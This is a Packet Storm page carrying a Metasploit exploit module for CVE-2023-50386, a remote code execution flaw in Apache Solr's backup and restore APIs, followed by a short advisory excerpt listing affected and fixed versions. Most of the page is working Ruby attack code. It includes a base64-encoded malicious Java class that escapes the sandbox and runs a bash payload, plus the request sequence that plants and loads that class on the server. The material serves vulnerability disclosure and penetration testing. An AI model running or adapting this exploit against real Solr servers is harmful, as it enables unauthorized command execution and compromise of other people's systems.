

Apache Solr Backup/Restore API Remote Code Execution

Apache Solr versions 6.0.0 through 8.11.2 and versions 9.0.0 up to 9.4.1 are affected by an unrestricted file upload vulnerability which can result in remote code execution in the context of the user running Apache Solr. When Apache Solr creates a Collection, it will use a specific directory as the classpath and load some classes from it. The backup function of the Collection can export malicious class files uploaded by attackers to the directory, allowing Solr to load custom classes and create arbitrary Java code. Execution can further bypass the Java sandbox configured by Solr, ultimately causing arbitrary command execution.

Packet Storm
### This module requires Metasploit: Current source: MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Java  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::ApacheSolr  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache Solr Backup/Restore APIs RCE',        'Description' => %q{          Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1 is affected by an Unrestricted Upload of File          with Dangerous Type vulnerability which can result in remote code execution in the context of the user running          Apache Solr. When Apache Solr creates a Collection, it will use a specific directory as the classpath and load          some classes from it. The backup function of the Collection can export malicious class files uploaded by          attackers to the directory, allowing Solr to load custom classes and create arbitrary Java code. Execution          can further bypass the Java sandbox configured by Solr, ultimately causing arbitrary command execution.        },        'Author' => [          'l3yx', # discovery          'jheysel-r7' # module        ],        'References' => [          [ 'URL', ''],          [ 'URL', ''],          [ 'URL', ''],          [ 'CVE', '2023-50386']        ],        'License' => MSF_LICENSE,        'Platform' => %w[unix linux],        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Unix Command',            {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD            }          ]        ],        'Payload' => {          'BadChars' => "\x20"        },        'DefaultTarget' => 0,        'DefaultOptions' => {          'FETCH_WRITABLE_DIR' => '/tmp/'        },        'DisclosureDate' => '2024-02-24',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        Opt::RPORT(8983),'USERNAME', [false, 'Solr username', 'solr']),'PASSWORD', [false, 'Solr password']),'TARGETURI', [false, 'Path to Solr', 'solr']),      ]    )  end  # If authentication is used  @auth_string = ''  def check    print_status('Running check method')    auth_res = solr_check_auth    unless auth_res      return CheckCode::Unknown('Authentication failed!')    end    # convert to JSON    ver_json = auth_res.get_json_document    # get Solr version    solr_version =['lucene']['solr-spec-version'])    print_status("Found Apache Solr #{solr_version}")    # get OS version details    @target_platform = ver_json['system']['name']    target_arch = ver_json['system']['arch']    target_osver = ver_json['system']['version']    print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}")    unless solr_version.between?('6.0.0'),'8.11.2')) ||           solr_version.between?('9.0.0'),'9.4.0'))      return CheckCode::Safe('Running version of Solr is not vulnerable!')    end    CheckCode::Appears("Found Apache Solr version: #{ver_json['lucene']['solr-spec-version']}")  end  # This method returns the compiled byte code of the following class,  #  # package zk_backup_0.configs.confname;  #  # import sun.misc.Unsafe;  # import;  # import;  # import;  # import;  # import java.lang.reflect.Field;  # import java.lang.reflect.Method;  # import;  # import java.util.Map;  #  #  # public class SourceParser {  #  #     static {  #         try {  #             Field unsafeField = Unsafe.class.getDeclaredField("theUnsafe");  #             unsafeField.setAccessible(true);  #             Unsafe unsafe = (Unsafe) unsafeField.get(null);  #             Module module = Object.class.getModule();  #             Class<?> currentClass = SourceParser.class;  #             long addr = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));  #             unsafe.getAndSetObject(currentClass, addr, module);  #  #             String[] cmd = {"bash", "-c", "METASPLOIT_PAYLOAD" };  #             Class clz = Class.forName("java.lang.ProcessImpl");  #             Method method = clz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);  #             method.setAccessible(true);  #             Process process = (Process) method.invoke(clz, cmd, null, null, null, false);  #         } catch (Exception e) {  #             e.printStackTrace();  #         }  #     }  # }  def go_go_gadget(configuration1_name)    gadget = ''    gadget << 'yv66vgAAAD0AaQoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClW'    gadget << 'BwAIAQAPc3VuL21pc2MvVW5zYWZlCAAKAQAJdGhlVW5zYWZlCgAMAA0HAA4MAA8AEAEAD2phdmEv'    gadget << 'bGFuZy9DbGFzcwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZh'    gadget << 'L2xhbmcvcmVmbGVjdC9GaWVsZDsKABIAEwcAFAwAFQAWAQAXamF2YS9sYW5nL3JlZmxlY3QvRmll'    gadget << 'bGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgoAEgAYDAAZABoBAANnZXQBACYoTGphdmEvbGFuZy9P'    gadget << 'YmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwoADAAcDAAdAB4BAAlnZXRNb2R1bGUBABQoKUxqYXZh'    gadget << 'L2xhbmcvTW9kdWxlOwcAIAEAKXprX2JhY2t1cF8wL2NvbmZpZ3MvY29uZm5hbWUvU291cmNlUGFy'    gadget << 'c2VyCAAiAQAGbW9kdWxlCgAHACQMACUAJgEAEW9iamVjdEZpZWxkT2Zmc2V0AQAcKExqYXZhL2xh'    gadget << 'bmcvcmVmbGVjdC9GaWVsZDspSgoABwAoDAApACoBAA9nZXRBbmRTZXRPYmplY3QBADkoTGphdmEv'    gadget << 'bGFuZy9PYmplY3Q7SkxqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsHACwBABBq'    gadget << 'YXZhL2xhbmcvU3RyaW5nCAAuAQAEYmFzaAgAMAEAAi1jCAAyAQASTUVUQVNQTE9JVF9QQVlMT0FE'    gadget << 'CAA0AQAVamF2YS5sYW5nLlByb2Nlc3NJbXBsCgAMADYMADcAOAEAB2Zvck5hbWUBACUoTGphdmEv'    gadget << 'bGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7CAA6AQAFc3RhcnQHADwBABNbTGphdmEvbGFu'    gadget << 'Zy9TdHJpbmc7BwA+AQANamF2YS91dGlsL01hcAcAQAEAJFtMamF2YS9sYW5nL1Byb2Nlc3NCdWls'    gadget << 'ZGVyJFJlZGlyZWN0OwkAQgBDBwBEDABFAEYBABFqYXZhL2xhbmcvQm9vbGVhbgEABFRZUEUBABFM'    gadget << 'amF2YS9sYW5nL0NsYXNzOwoADABIDABJAEoBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9s'    gadget << 'YW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsK'    gadget << 'AEwAEwcATQEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAoAQgBPDABQAFEBAAd2YWx1ZU9mAQAW'    gadget << 'KFopTGphdmEvbGFuZy9Cb29sZWFuOwoATABTDABUAFUBAAZpbnZva2UBADkoTGphdmEvbGFuZy9P'    gadget << 'YmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsHAFcBABFqYXZhL2xh'    gadget << 'bmcvUHJvY2VzcwcAWQEAE2phdmEvbGFuZy9FeGNlcHRpb24KAFgAWwwAXAAGAQAPcHJpbnRTdGFj'    gadget << 'a1RyYWNlAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACDxjbGluaXQ+AQANU3RhY2tNYXBUYWJs'    gadget << 'ZQEAClNvdXJjZUZpbGUBABFTb3VyY2VQYXJzZXIuamF2YQEADElubmVyQ2xhc3NlcwcAZQEAIWph'    gadget << 'dmEvbGFuZy9Qcm9jZXNzQnVpbGRlciRSZWRpcmVjdAcAZwEAGGphdmEvbGFuZy9Qcm9jZXNzQnVp'    gadget << 'bGRlcgEACFJlZGlyZWN0ACEAHwACAAAAAAACAAEABQAGAAEAXQAAAB0AAQABAAAABSq3AAGxAAAA'    gadget << 'AQBeAAAABgABAAAADgAIAF8ABgABAF0AAAEaAAYACgAAAK8SBxIJtgALSyoEtgARKgG2ABfAAAdM'    gadget << 'EgK2ABtNEh9OKxIMEiG2AAu2ACM3BCstFgQstgAnVwa9ACtZAxItU1kEEi9TWQUSMVM6BhIzuAA1'    gadget << 'OgcZBxI5CL0ADFkDEjtTWQQSPVNZBRIrU1kGEj9TWQeyAEFTtgBHOggZCAS2AEsZCBkHCL0AAlkD'    gadget << 'GQZTWQQBU1kFAVNZBgFTWQcDuABOU7YAUsAAVjoJpwAISyq2AFqxAAEAAACmAKkAWAACAF4AAABC'    gadget << 'ABAAAAASAAgAEwANABQAFgAVABwAFgAfABcALAAYADUAGgBKABsAUQAcAHgAHQB+AB4ApgAhAKkA'    gadget << 'HwCqACAArgAiAGAAAAAJAAL3AKkHAFgEAAIAYQAAAAIAYgBjAAAACgABAGQAZgBoBAk='    gadget = Rex::Text.decode_base64(gadget)    # Replace 'confname' with our randomized 8 character configuration name    gadget.sub!('confname', configuration1_name)    # Replace the placeholder payload with our packed payload which is prefixed with it's size.    gadget.sub!("\x00\x12METASPLOIT_PAYLOAD", packed_payload(payload.encoded))  end  def packed_payload(pload)    "#{[pload.length].pack('n')}#{pload}"  end  def create_zip    zip_file =    directory_to_zip = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-50386', 'conf')    Dir.glob(File.join(directory_to_zip, '**', '*')).each do |file_path|      if File.file?(file_path)        relative_path = file_path.sub("#{directory_to_zip}/", '') # Get relative path        file_contents =        zip_file.add_file(relative_path, file_contents)      elsif        relative_path = file_path.sub("#{directory_to_zip}/", '') # Get relative path        zip_file.add_file(relative_path, nil, recursive: true)      end    end    zip_file  end  def upload_conf(file_name, zip_archive, conf_name)    mime =    mime.add_part(zip_archive, 'application/octet-stream', 'binary', "form-data; filename=\"#{file_name}\"")    res = solr_post({      'uri' => normalize_uri(target_uri.path, 'admin', 'configs'),      'method' => 'POST',      'ctype' => 'application/octet-stream',      'data' => zip_archive,      'auth' => @auth_string,      'vars_get' => {        'action' => 'UPLOAD',        'name' => conf_name      }    })    fail_with(Failure::UnexpectedReply, 'No response from the target') unless res    fail_with(Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200    data = res.get_json_document    if data.dig('responseHeader', 'status') == 0      print_good('Uploaded configuration successfully')    elsif data.dig('error', 'msg')      fail_with(Failure::UnexpectedReply, "Failed to upload configuration. Target responded with error: #{data['error']['msg']}")    else      fail_with(Failure::UnexpectedReply, "Failed to upload configuration: #{conf_name} to the target")    end    res  end  def create_collection(collection_name, configuration_name)    solr_get({      'uri' => normalize_uri(target_uri.path, 'admin', 'collections'),      'method' => 'GET',      'auth' => @auth_string,      'vars_get' => {        'action' => 'CREATE',        'name' => collection_name,        'numShards' => 1,        'replicationFactor' => 1,        'wt' => 'json',        'collection.configName' => configuration_name      }    })  end  def backup_collection(collection_name, location, backup_name)    res = solr_get({      'uri' => normalize_uri(target_uri.path, 'admin', 'collections'),      'method' => 'GET',      'auth' => @auth_string,      'vars_get' => {        'action' => 'BACKUP',        'collection' => collection_name,        'location' => location,        'name' => backup_name      }    })    fail_with(Failure::UnexpectedReply, 'No response from the target') unless res    data = res.get_json_document    if data.dig('responseHeader', 'status') == 0      print_good('Backed up collection successfully')    elsif data.dig('error', 'msg')      fail_with(Failure::UnexpectedReply, "Failed to Backup configuration. Target responded with error: #{data['error']['msg']}")    else      fail_with(Failure::UnexpectedReply, "Failed to create collection: #{collection_name} successfully")    end    res  end  def cleanup    print_status('Cleaning up...')    # Clean up collections and configurations    # Delete the collection first then the configs or you'll get the following error:    # "Can not delete ConfigSet as it is currently being used by collection [PchuSaNJ]"    if @collection_res&.code == 200      delete_collection_res = solr_get({        'uri' => normalize_uri(target_uri.path, 'admin', 'collections'),        'method' => 'GET',        'auth' => @auth_string,        'vars_get' => {          'action' => 'DELETE',          'name' => @collection1_name        }      })      print_error("Unable to delete collection: #{@collection1_name}") unless delete_collection_res&.code == 200    end    if @conf1_res&.code == 200      delete_conf1_res = solr_get({        'uri' => normalize_uri(target_uri.path, 'admin', 'configs'),        'method' => 'GET',        'auth' => @auth_string,        'vars_get' => {          'action' => 'DELETE',          'name' => @configuration1_name        }      })      print_error("Unable to delete config: #{@configuration1_name}") unless delete_conf1_res&.code == 200    end    if @conf2_res&.code == 200      delete_conf2_res = solr_get({        'uri' => normalize_uri(target_uri.path, 'admin', 'configs'),        'method' => 'GET',        'auth' => @auth_string,        'vars_get' => {          'action' => 'DELETE',          'name' => @configuration2_name        }      })      print_error("Unable to delete config: #{@configuration2_name}") unless delete_conf2_res&.code == 200    end  end  def exploit    @collection1_name = Rex::Text.rand_text_alpha(8)    @configuration1_name = Rex::Text.rand_text_alpha_lower(8)    @collection2_name = Rex::Text.rand_text_alpha(8)    # Zip up conf1    conf1_zip = create_zip    conf1_zip.add_file('SourceParser.class', go_go_gadget(@configuration1_name))    conf1_zip.add_file('solrconfig.xml',, 'exploits', 'CVE-2023-50386', 'solrconfig.xml')))    # Upload conf1    @conf1_res = upload_conf(@configuration1_name + '.zip', conf1_zip.pack, @configuration1_name)    # Create collection from conf1    @collection_res = create_collection(@collection1_name, @configuration1_name)    fail_with(Failure::UnexpectedReply, 'No response from the target') unless @collection_res    data = @collection_res.get_json_document    if @collection_res.code == 200 && data['responseHeader']['status'] == 0      vprint_good('Created collection successfully')    elsif data['error']['msg']      fail_with(Failure::UnexpectedReply, "Failed to upload configuration. Target responded with error: #{data['error']['msg']}")    else      fail_with(Failure::UnexpectedReply, "Failed to create collection: #{collection_name} successfully")    end    # Backup collection and export conf1    location = '/var/solr/data/'    backup_name = "#{@collection2_name}_shard1_replica_n1"    backup_collection(@collection1_name, location, backup_name)    # Now you need to export it again through the backup and interface `collection1` note the changes in `location` and `name`:    location = "/var/solr/data/#{backup_name}"    backup_name = 'lib'    backup_collection(@collection1_name, location, backup_name)    # Zip up conf2    conf2_zip = create_zip    editted_solrconfig =, 'exploits', 'CVE-2023-50386', 'solrconfig.xml'))    editted_solrconfig = editted_solrconfig.gsub('</config>', "     <valueSourceParser name=\"myfunc\" class=\"zk_backup_0.configs.#{@configuration1_name}.SourceParser\" />\n</config>")    conf2_zip.add_file('solrconfig.xml', editted_solrconfig)    # Upload conf2    @configuration2_name = Rex::Text.rand_text_alpha(8)    @conf2_res = upload_conf('', conf2_zip.pack, @configuration2_name)    # Attempt to create a collection from conf2 which will load the SourceParser.class we uploaded as a port of the    # first conf1 which will then cause an error as it executes our malicious class (the collection does not get created)    res = create_collection(@collection2_name, @configuration2_name)    fail_with(Failure::UnexpectedReply, 'No response from the target') unless res    data = res&.get_json_document    if res.code == 400 && data['error']['msg'] == "Underlying core creation failed while creating collection: #{@collection2_name}"      print_good('Successfully dropped the payload')    else      fail_with(Failure::UnexpectedReply, "Failed to create collection: #{@configuration2_name} successfully")    end  endend

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GHSA-37vr-vmg4-jwpw: Apache Solr: Backup/Restore APIs allow for deployment of executables in malicious ConfigSets

Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. In the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API. When backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups). If the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted. When Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. In these ...

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